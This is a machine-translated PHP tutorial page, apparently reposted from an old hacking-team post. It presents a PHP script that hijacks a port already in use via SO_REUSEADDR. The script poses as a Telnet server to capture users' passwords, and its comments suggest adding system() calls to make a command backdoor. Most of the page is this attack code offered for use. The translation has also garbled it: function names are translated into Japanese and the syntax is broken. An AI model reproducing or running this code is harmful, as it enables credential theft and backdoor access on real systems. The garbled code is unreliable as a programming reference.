ホームページ >バックエンド開発 >PHPチュートリアル >PHP_PHP チュートリアルでのポートの再利用/ハイジャック

PHP_PHP チュートリアルでのポートの再利用/ハイジャック

WBOY
WBOYオリジナル
2016-07-13 17:31:58823ブラウズ

127.0.0.1 を監視する場合、パブリック IP へのアクセスは影響を受けません。パブリック IP を監視する場合、127.0.0.1 などの IP は影響を受けません。
元のサービスはもう利用できないため、これはユーザーのパスワードを偽装するために使用される可能性があります。あるいは、イントラネット ユーザー向けのバックドアとして残しておきます。
最後に、MSN: CQXY[AT]21CN を追加してください。 NET にアドバイスを求めます。
#!/usr/bin/php (現​​在の主流の開発言語として) -q
#c0dz by Darkness[BST]
#Team:www.bugkidz.org
#E-mail:cqxy[at]21cn 。 net
if ($argc != 3 || in_array($argc[1] , array(--help,-h,?)))
{
echo "Use:#./$argv[0] www.bugkidz .org 192.168.0.1 21 ";
echo "c0dz By Darkness[BST]";
exit;
}
error_reporting(E_ALL);

set_time_limit(0);

ob_implicit_flush();

$host = $argv[1];
$ port = $argv[2];
if (($sock =socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
echo "socket_create() が失敗しました: 理由: " .socket_strerror($sock) " ";
} /*SOCKET を作成します*/
socket_set_option($sock,SOL_SOCKET,SO_REUSEADDR,1); /*ポートの再利用が実現できるように、SOCKET 接続属性を SO_REUSEADDR に設定します*/
if (($ret =ソケット_バインド( $sock, $host, $port)) < 0) {
echo "socket_bind() が失敗しました: 理由: " 。socket_strerror($ret) " ";
}/*バインド ポート*/

if (($ret =socket_listen($sock, 5)) echo "socket_listen() が失敗しました: 理由: " .socket_strerror($ret) . " ";
} /*リッスン開始*/


while(true) {

if (($sniffer =ソケット_accept($sock)) < 0) {
echo "socket_accept() 失敗しました: 理由: " .socket_strerror ($スニッファー) 。 ";
break;
}
if ($port == 23)
{
$txt = "Telnet サーバーへようこそ ";
$txt .="ユーザー: ";
socket_write($sniffer, $txt, strlen($txt));
} /*これは偽装情報です。パスワードを騙すために元の TELNET サーバーに偽装します*/

while(true) {

if(($buf _read($sniffer">=@socket_read($sniffer, 2048, php(現在の主流の開発言語として)_BINARY_READ)) ==false)
{

break;

}

if (!$buf = トリム($buf)) {
続行;
}


if ($buf == !quit) {
break;
}
if ($buf == !shutdown) {
socket_close ($sniffer);
break 2; /*実際には、ここで system() を呼び出して CMD バックドアにすることができます*/
}

$sniff_data = "$buf ";

/* elseソケット_ライト($sniffer, $sniff_data, strlen($sniff_data));*/
echo $sniff_data;
/*出力文字列、ここでファイル処理を追加したり、パスワードを保存したりできます*/

socket_close($sniffer);


}
socket_close($resock);
socket_close($sock);
?>

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/508751.html技術記事 127.0.0.1 を監視する場合、パブリック IP アドレスへのアクセスは影響を受けません。 パブリック IP アドレスを監視する場合、127.0.0.1 などの IP アドレスは影響を受けません。 元のサービスはもう利用できないため、これを使用してユーザーのパスワードを偽装することができます...
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。